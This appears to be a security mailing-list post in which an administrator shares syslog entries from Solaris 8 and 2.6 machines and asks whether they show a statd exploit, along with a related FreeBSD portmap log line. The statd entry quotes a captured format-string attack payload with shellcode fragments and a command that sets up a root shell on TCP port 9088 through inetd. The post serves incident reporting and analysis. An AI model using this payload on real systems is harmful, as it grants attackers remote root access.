Solaris statd exploit?

[Hartoyo <suntzu () THEARTOFWAR ORG>]

Hi,

I got this entry today on 3 different solaris boxes...
Is this some kind of statd exploit?
The OS is Solaris 8 (and Solaris 2.6)...

All of the entries have the same pattern and time (probably 1 or 2
seconds difference). A script kiddie attack?

----
Aug 30 11:15:14 earth statd[236]: [ID 462824 auth.error] statd: attempt
to create "/var/statmon/sm/%08x %08x %08x %08x %08x %08x %08x %08x %08x
%08x %08x %08x %08x %08x %0242x%n%055x%n%012x%n%0192x%nK^v ^( ^ ^.  #^1
F'F* FF+, NV1@/bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i"
> >
/tmp/m; /usr/sbin/inetd /tmp/m;"


At the same time, my FreeBSD box gave me this entry...
Is it related? (based on the time)...

---
Aug 30 11:15:14 bsdbox portmap[32421]: connect from 216.227.9.49 to
getport(status):
request from unauthorized host